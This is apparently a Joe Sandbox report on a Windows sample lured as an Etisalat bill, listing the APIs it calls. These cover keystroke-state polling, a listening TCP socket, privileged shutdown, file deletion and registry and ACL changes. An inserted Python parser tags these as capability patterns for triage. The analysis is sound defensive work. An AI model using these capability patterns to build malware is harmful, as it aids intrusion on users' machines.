                                        • Part of subcall function 00B838D8: __flsbuf.LIBCMT ref: 00B83953
                                        • Part of subcall function 00B838D8: __flsbuf.LIBCMT ref: 00B8396B
                                      • __swprintf.LIBCMT ref: 00BCCC2F
                                      • __swprintf.LIBCMT ref: 00BCCC7E
                                      • __swprintf.LIBCMT ref: 00BCCCCD
                                      Similarity
                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                      • API String ID: 3953360268-2428617273
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00BCF221
                                      • _wcscmp.LIBCMT ref: 00BCF236
                                      • _wcscmp.LIBCMT ref: 00BCF24D
                                      • GetFileAttributesW.KERNEL32(?), ref: 00BCF25F
                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00BCF279
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00BCF291
                                      • FindClose.KERNEL32(00000000), ref: 00BCF29C
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00BCF2B8
                                      • _wcscmp.LIBCMT ref: 00BCF2DF
                                      • _wcscmp.LIBCMT ref: 00BCF2F6
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00BCF308
                                      • SetCurrentDirectoryW.KERNEL32(00C1A5A0), ref: 00BCF326
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BCF330
                                      • FindClose.KERNEL32(00000000), ref: 00BCF33D
                                      • FindClose.KERNEL32(00000000), ref: 00BCF34F
                                      Similarity
                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                      • String ID: *.*
                                      • API String ID: 1803514871-438819550
                                      APIs
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BE0BDE
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00BEF910,00000000,?,00000000,?,?), ref: 00BE0C4C
                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00BE0C94
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00BE0D1D
                                      • RegCloseKey.ADVAPI32(?), ref: 00BE103D
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00BE104A
                                      Similarity
                                      • API ID: Close$ConnectCreateRegistryValue
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                      • API String ID: 536824911-966354055
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00BCF37E
                                      • _wcscmp.LIBCMT ref: 00BCF393
                                      • _wcscmp.LIBCMT ref: 00BCF3AA
                                        • Part of subcall function 00BC45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00BC45DC
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00BCF3D9
                                      • FindClose.KERNEL32(00000000), ref: 00BCF3E4
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00BCF400
                                      • _wcscmp.LIBCMT ref: 00BCF427
                                      • _wcscmp.LIBCMT ref: 00BCF43E
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00BCF450
                                      • SetCurrentDirectoryW.KERNEL32(00C1A5A0), ref: 00BCF46E
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BCF478
                                      • FindClose.KERNEL32(00000000), ref: 00BCF485
                                      • FindClose.KERNEL32(00000000), ref: 00BCF497
                                      Similarity
                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                      • String ID: *.*
                                      • API String ID: 1824444939-438819550
                                      APIs
                                        • Part of subcall function 00BB874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BB8766
                                        • Part of subcall function 00BB874A: GetLastError.KERNEL32(?,00BB822A,?,?,?), ref: 00BB8770
                                        • Part of subcall function 00BB874A: GetProcessHeap.KERNEL32(00000008,?,?,00BB822A,?,?,?), ref: 00BB877F
                                        • Part of subcall function 00BB874A: HeapAlloc.KERNEL32(00000000,?,00BB822A,?,?,?), ref: 00BB8786
                                        • Part of subcall function 00BB874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BB879D
                                        • Part of subcall function 00BB87E7: GetProcessHeap.KERNEL32(00000008,00BB8240,00000000,00000000,?,00BB8240,?), ref: 00BB87F3
                                        • Part of subcall function 00BB87E7: HeapAlloc.KERNEL32(00000000,?,00BB8240,?), ref: 00BB87FA
                                        • Part of subcall function 00BB87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00BB8240,?), ref: 00BB880B
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00BB825B
                                      • _memset.LIBCMT ref: 00BB8270
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00BB828F
                                      • GetLengthSid.ADVAPI32(?), ref: 00BB82A0
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00BB82DD
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00BB82F9
                                      • GetLengthSid.ADVAPI32(?), ref: 00BB8316
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00BB8325
                                      • HeapAlloc.KERNEL32(00000000), ref: 00BB832C
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00BB834D
                                      • CopySid.ADVAPI32(00000000), ref: 00BB8354
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00BB8385
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00BB83AB
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00BB83BF
                                      Similarity
                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                      • String ID:
                                      • API String ID: 3996160137-0
                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                      • API String ID: 0-4052911093
                                      APIs
                                        • Part of subcall function 00BE10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BE0038,?,?), ref: 00BE10BC
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BE0737
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00BE07D6
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00BE086E
                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00BE0AAD
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00BE0ABA
                                      Similarity
                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                      • String ID:
                                      • API String ID: 1240663315-0
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00BC0241
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00BC02C2
                                      • GetKeyState.USER32(000000A0), ref: 00BC02DD
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00BC02F7
                                      • GetKeyState.USER32(000000A1), ref: 00BC030C
                                      • GetAsyncKeyState.USER32(00000011), ref: 00BC0324
                                      • GetKeyState.USER32(00000011), ref: 00BC0336
                                      • GetAsyncKeyState.USER32(00000012), ref: 00BC034E
                                      • GetKeyState.USER32(00000012), ref: 00BC0360
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00BC0378
                                      • GetKeyState.USER32(0000005B), ref: 00BC038A
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      APIs
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                      • CoInitialize.OLE32 ref: 00BD8718
                                      • CoUninitialize.OLE32 ref: 00BD8723
                                      • CoCreateInstance.OLE32(?,00000000,00000017,00BF2BEC,?), ref: 00BD8783
                                      • IIDFromString.OLE32(?,?), ref: 00BD87F6
                                      • VariantInit.OLEAUT32(?), ref: 00BD8890
                                      • VariantClear.OLEAUT32(?), ref: 00BD88F1
                                      Similarity
                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                      • API String ID: 834269672-1287834457
                                      APIs
                                      Similarity
                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                      • String ID:
                                      • API String ID: 1737998785-0
                                      APIs
                                        • Part of subcall function 00B648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B648A1,?,?,00B637C0,?), ref: 00B648CE
                                        • Part of subcall function 00BC4CD3: GetFileAttributesW.KERNEL32(?,00BC3947), ref: 00BC4CD4
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00BC3ADF
                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00BC3B87
                                      • MoveFileW.KERNEL32(?,?), ref: 00BC3B9A
                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00BC3BB7
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BC3BD9
                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00BC3BF5
                                      Similarity
                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                      • String ID: \*.*
                                      • API String ID: 4002782344-1173974218
                                      • Opcode ID: 99bc4a76ca08b76af1d8faa3d0bce3909363b69bb4cb1c7bd4c4628bd54b3a5a
                                      • Instruction ID: dbad2686ed50249127587347c8b451ebf7e0793aad3535252e2cc14ba8b1b4f8
                                      • Opcode Fuzzy Hash: 99bc4a76ca08b76af1d8faa3d0bce3909363b69bb4cb1c7bd4c4628bd54b3a5a
                                      • Instruction Fuzzy Hash: 20514E318052499ACF15EBA0DD92EFDB7F9AF14704F6481E9E44277091DF256F09CBA0
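The per-function "APIs" listings above are a flat text export, and triaging them by eye across hundreds of functions is slow. The Python below is an added editorial example, not part of the Joe Sandbox report or its tooling: it parses the `• Api.MODULE(args), ref: ADDR` lines (including the indented `Part of subcall function XXXXXXXX:` variants and the paren-less `_memmove.LIBCMT ref: ...` form) into records and tags an API set with coarse capability labels. The sample lines are copied from the listings on this page; the capability names and the API groupings behind them are the editor's own triage choices, not anything Joe Sandbox emits.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One "• Api.MODULE(args), ref: ADDR" line, optionally prefixed with
# "Part of subcall function XXXXXXXX:". The argument list and its
# parentheses are absent for entries such as "_memmove.LIBCMT ref: 00B67F82".
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][\w@:]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str] = field(default_factory=list)
    ref: int = 0                      # address of the call site
    subcall_of: Optional[int] = None  # callee address when the call is reached indirectly


def parse_api_lines(lines):
    """Return an ApiCall for every API line; headings and dump metadata are skipped."""
    calls = []
    for line in lines:
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            args=raw_args.split(",") if raw_args else [],
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


# Editor-chosen capability labels: a label applies when every API in its set is present.
CAPABILITY_TAGS = {
    "directory-walk": {"FindFirstFileW", "FindNextFileW", "FindClose"},
    "file-delete-or-move": {"DeleteFileW", "MoveFileW"},
    "tcp-listener": {"socket", "bind", "listen"},
    "privileged-shutdown": {"AdjustTokenPrivileges", "ExitWindowsEx"},
    "process-enumeration": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "dynamic-import": {"LoadLibraryA", "GetProcAddress"},
}


def capabilities(calls, include_subcalls=True):
    """Sorted capability labels whose API set is fully covered by the parsed calls."""
    names = {c.api for c in calls if include_subcalls or c.subcall_of is None}
    return sorted(tag for tag, needed in CAPABILITY_TAGS.items() if needed <= names)


# Constructed sample: lines copied from the "APIs" listings on this page.
SAMPLE_LINES = [
    "APIs",
    "  • Part of subcall function 00B648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B648A1,?,?,00B637C0,?), ref: 00B648CE",
    "• FindFirstFileW.KERNEL32(?,?), ref: 00BC3ADF",
    "• DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00BC3B87",
    "• MoveFileW.KERNEL32(?,?), ref: 00BC3B9A",
    "• FindNextFileW.KERNEL32(00000000,00000010), ref: 00BC3BD9",
    "• FindClose.KERNEL32(00000000,?,?,?,?), ref: 00BC3BF5",
    "  • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82",
    "• CreateToolhelp32Snapshot.KERNEL32 ref: 00BDF151",
    "Strings",
]

if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LINES)
    for c in parsed:
        print(f"{c.ref:08X} {c.api}.{c.module} argc={len(c.args)} subcall_of={c.subcall_of}")
    print("capabilities:", capabilities(parsed))
```

Run the whole report text through `parse_api_lines` one function entry at a time (split on the `Opcode ID:` line) to get a capability tag per function; tagging is deliberately conservative, requiring every API in a set, so a function that only calls `FindFirstFileW` is not labelled a directory walk.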
                                      APIs
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00BCF6AB
                                      • Sleep.KERNEL32(0000000A), ref: 00BCF6DB
                                      • _wcscmp.LIBCMT ref: 00BCF6EF
                                      • _wcscmp.LIBCMT ref: 00BCF70A
                                      • FindNextFileW.KERNEL32(?,?), ref: 00BCF7A8
                                      • FindClose.KERNEL32(00000000), ref: 00BCF7BE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                      • String ID: *.*
                                      • API String ID: 713712311-438819550
                                      • Opcode ID: f843d5625b7476d819a2bb4f9739817aa749f3f1d637edb61f24be5794f3cac7
                                      • Instruction ID: a1ce8b54d1d94005c6709829fddfbf8d9c2b50d5407653f0e8795b9ac731249c
                                      • Opcode Fuzzy Hash: f843d5625b7476d819a2bb4f9739817aa749f3f1d637edb61f24be5794f3cac7
                                      • Instruction Fuzzy Hash: 4641387190020A9BDF15DF64CC85EEEBBF9EF05310F1445EAE815A72A1EB309E54CB90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                      • API String ID: 0-1546025612
                                      • Opcode ID: 5032888dc4b65f862b24e8010d70458ff495f5099ef08d49a854e4f23b78fa62
                                      • Instruction ID: 38ca8dd2972ff162b7e2b14caae356b5183733f6823cb5a4204b59726e189c58
                                      • Opcode Fuzzy Hash: 5032888dc4b65f862b24e8010d70458ff495f5099ef08d49a854e4f23b78fa62
                                      • Instruction Fuzzy Hash: 58A27D70E0821ACBDF24CF58C9907ADB7F1FB55315F1481EAD96AA7680EB309E81CB51
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: f9804de1bda5e741233877cbf1a73e1939fe5f44c4953a3556feee95cd3d83c0
                                      • Instruction ID: a758c760b1c68dacd53263746e5a3eec2a22a90012dd86faf590b1559716299c
                                      • Opcode Fuzzy Hash: f9804de1bda5e741233877cbf1a73e1939fe5f44c4953a3556feee95cd3d83c0
                                      • Instruction Fuzzy Hash: 0A126970A00609DBDF14EFA4D981AFEB7F5FF48300F1086A9E45AA7251EB75AD11CB50
                                      APIs
                                        • Part of subcall function 00BB8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BB8D0D
                                        • Part of subcall function 00BB8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BB8D3A
                                        • Part of subcall function 00BB8CC3: GetLastError.KERNEL32 ref: 00BB8D47
                                      • ExitWindowsEx.USER32(?,00000000), ref: 00BC549B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                      • String ID: $@$SeShutdownPrivilege
                                      • API String ID: 2234035333-194228
                                      • Opcode ID: 74ddbc5568a3f959c071ff7bd70cd22b309a54f98728e5a9c2114ba6026522fc
                                      • Instruction ID: 2a421f7b57dc668a78ca39d787139bccd5226ff27f11ab5d02bcf582f7226677
                                      • Opcode Fuzzy Hash: 74ddbc5568a3f959c071ff7bd70cd22b309a54f98728e5a9c2114ba6026522fc
                                      • Instruction Fuzzy Hash: 49012F71755A022BF73C6778EC8AFBA72D8EB04342F2000A9FC46D62D6DA903CC081A0
                                      APIs
                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00BD65EF
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00BD65FE
                                      • bind.WSOCK32(00000000,?,00000010), ref: 00BD661A
                                      • listen.WSOCK32(00000000,00000005), ref: 00BD6629
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00BD6643
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00BD6657
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                      • String ID:
                                      • API String ID: 1279440585-0
                                      • Opcode ID: 0826e36e41efa2beadca48105d7c603d83c6b4eaac15c36851214a49f6897274
                                      • Instruction ID: 42ac8813d1309368b061a4fafe15949994bb3b3b7aab1ef867d4537d6dc25aa8
                                      • Opcode Fuzzy Hash: 0826e36e41efa2beadca48105d7c603d83c6b4eaac15c36851214a49f6897274
                                      • Instruction Fuzzy Hash: 3D219C312002059FDB10AF64C885BBEB7E9EF48720F1481AAE956EB3D1DB74AD01CB51
                                      APIs
                                        • Part of subcall function 00B80FF6: std::exception::exception.LIBCMT ref: 00B8102C
                                        • Part of subcall function 00B80FF6: __CxxThrowException@8.LIBCMT ref: 00B81041
                                      • _memmove.LIBCMT ref: 00BB062F
                                      • _memmove.LIBCMT ref: 00BB0744
                                      • _memmove.LIBCMT ref: 00BB07EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                      • String ID:
                                      • API String ID: 1300846289-0
                                      • Opcode ID: 7d0c3f64cc732bcc512e7f279cc8393b003b2c1cbf5227a3712c1da1407c7524
                                      • Instruction ID: 4835a93d29eea81aa55e2467fcb21aa60b23871a78dfc867c7f617ea3b153e19
                                      • Opcode Fuzzy Hash: 7d0c3f64cc732bcc512e7f279cc8393b003b2c1cbf5227a3712c1da1407c7524
                                      • Instruction Fuzzy Hash: 7A027DB0A10209DBCF14EF64D981ABEBBF5FF44300F1480A9E80ADB255EB75DA51CB91
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00B619FA
                                      • GetSysColor.USER32(0000000F), ref: 00B61A4E
                                      • SetBkColor.GDI32(?,00000000), ref: 00B61A61
                                        • Part of subcall function 00B61290: DefDlgProcW.USER32(?,00000020,?), ref: 00B612D8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ColorProc$LongWindow
                                      • String ID:
                                      • API String ID: 3744519093-0
                                      • Opcode ID: 7cd30817d304e72aa3567b6256d0ebb6925f71915d8f17b2a6059fb6d929544b
                                      • Instruction ID: 9fa9a3912fc5702e4bd8ae2033155fcafc83a351bc8038d03cd0c02f52a2c46e
                                      • Opcode Fuzzy Hash: 7cd30817d304e72aa3567b6256d0ebb6925f71915d8f17b2a6059fb6d929544b
                                      • Instruction Fuzzy Hash: 87A15971105584BEEA38ABADAD85E7F39ECDB41346B1C49E9F412D61D2CF2C8D02D2B1
                                      APIs
                                        • Part of subcall function 00BD80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00BD80CB
                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00BD6AB1
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00BD6ADA
                                      • bind.WSOCK32(00000000,?,00000010), ref: 00BD6B13
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00BD6B20
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00BD6B34
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                      • String ID:
                                      • API String ID: 99427753-0
                                      • Opcode ID: 62c21c2c15febd92876180685f259eccf9d9284fed18312ad0c164ea85ffdee1
                                      • Instruction ID: 8d3bdeef58bcf51ae396acee1f9b35ece5ee4cfa48171a4407e1b6e7a2fc2d2a
                                      • Opcode Fuzzy Hash: 62c21c2c15febd92876180685f259eccf9d9284fed18312ad0c164ea85ffdee1
                                      • Instruction Fuzzy Hash: 0F41A475700210AFEB10AF64DC86F7EB7E9EB44710F048199FA5AAB3D2DA789D008791
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                      • String ID:
                                      • API String ID: 292994002-0
                                      • Opcode ID: 3a007cb047313ee07c716b905e673261f19ace29acd10b6d608ae62c92f30b87
                                      • Instruction ID: ed88d0db25d01cfedf05edde137d1b7dd576feefce62990b5979a873cc045a35
                                      • Opcode Fuzzy Hash: 3a007cb047313ee07c716b905e673261f19ace29acd10b6d608ae62c92f30b87
                                      • Instruction Fuzzy Hash: B011B2317009916FEB211F27DC84A6B77D8FF94725B444469E806DB241CB749D01CAA4
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00BA1D88,?), ref: 00BDC312
                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00BDC324
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
